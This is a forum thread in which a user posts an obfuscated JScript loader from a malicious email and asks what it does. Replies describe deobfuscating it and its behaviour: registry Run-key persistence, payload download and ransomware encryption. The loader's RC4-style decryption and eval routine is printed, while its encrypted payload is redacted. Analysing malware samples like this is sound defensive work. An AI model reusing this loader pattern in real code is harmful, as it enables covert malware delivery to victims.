Programmers: What does this code do?

[Conficker]

Hey everyone. One of my clients received this code via email and of course he opened the link. My question, what did it do?
No doubt it's malware, but can I clean up whatever mess it made?

<job>

<script language="JScript">

function v9e8d(v4af4, v6b46) {
var vb44b = [], vcb87 = 0, vadb6, vd293 = '';
for (var vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vb44b[vc4d9] = vc4d9;
}
for (vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vcb87 = (vcb87 + vb44b[vc4d9] + v4af4.charCodeAt(vc4d9 % v4af4.length)) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
}
vc4d9 = 0;
vcb87 = 0;
for (var v5e24 = 0; v5e24 < v6b46.length; v5e24++) {
vc4d9 = (vc4d9 + 1) % 256;
vcb87 = (vcb87 + vb44b[vc4d9]) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
vd293 += String.fromCharCode(v6b46.charCodeAt(v5e24) ^ vb44b[(vb44b[vc4d9] + vb44b[vcb87]) % 256]);
}
return vd293;
}

/*****************/

var v4af4 = "a3fa2f7a1bcf12560ecc5df80cef0345";

/*****************/

var v6007 = "****cut, too long for forum post****";

v6007 = v6007.split("|");

var v0d1f = "";

for (var vc4d9 = 0; vc4d9 < v6007.length; vc4d9++)
{
v0d1f = v0d1f + String.fromCharCode(v6007[vc4d9]);
}

v0d1f = v9e8d(v4af4, v0d1f);

eval(v0d1f);

</script>

</job>

 

[Sinbad]

maybe change the eval to a document.write() and see?

 

[SmartKit]

The evaluation executes Javascript code. Hopefully it was sandboxed and didn't do any damage.

 

[stricken]

var v6007 is the exploit payload... although it has been redacted.... my money is on a remote privilege escalation exploit.

Did he open it in IE?

 

[me_]

I've seen this - we had it already. I changed the eval to a write - it includes another obfuscated JScript script which:
- The script copies itself to the PC - it creates a wsf script locally (usually under Appdata\Roaming)
- If the user is not an admin, it writes a registry key to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Can't recall where it writes to if the user is an admin - most likely HKEY_LOCAL_MACHINE\...
This means the script is executed every time the PC is restarted.
- The script then polls a URL for malware to download (usually 0 day cryptoware distributions) and then executes the malware

FYI - JScript write - Replace eval(v0d1f) with:

var fso, f, r
var ForReading = 1, ForWriting = 2;
fso = new ActiveXObject("Scripting.FileSystemObject")
f = fspenTextFile("c:\\output.txt", ForWriting, true)
f.Write(v0d1f);
f.Close();

The variant we had wrote to %APPDATA%\Microsoft\Crypto
It created a new file name with a wsf extension
It added itself into the users Run location in the registry so it would execute every time the user logged on.
2 days later, it downloaded cryptoware and started encrypting all the files on all network shares the user had access to, but luckily it kept a log file in the above directory as well so we were able to quickly restore everything.

 

[halfmoonforever]

I've seen this - we had it already. I changed the eval to a write - it includes another obfuscated JScript script which:
- If the user is not an admin, it writes a registry key to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Can't recall where it writes to if the user is an admin - most likely HKEY_LOCAL_MACHINE\...
This means the script is executed every time the PC is restarted.
- The script then polls a URL for malware to download (usually 0 day cryptoware distributions) and then executes the malware

FYI - JScript write - Replace eval(v0d1f) with:

ActiveXObject? That stuff still works? What is this? 2002?

 

[Solarion]

Don't run it OP. This code opens up a black hole.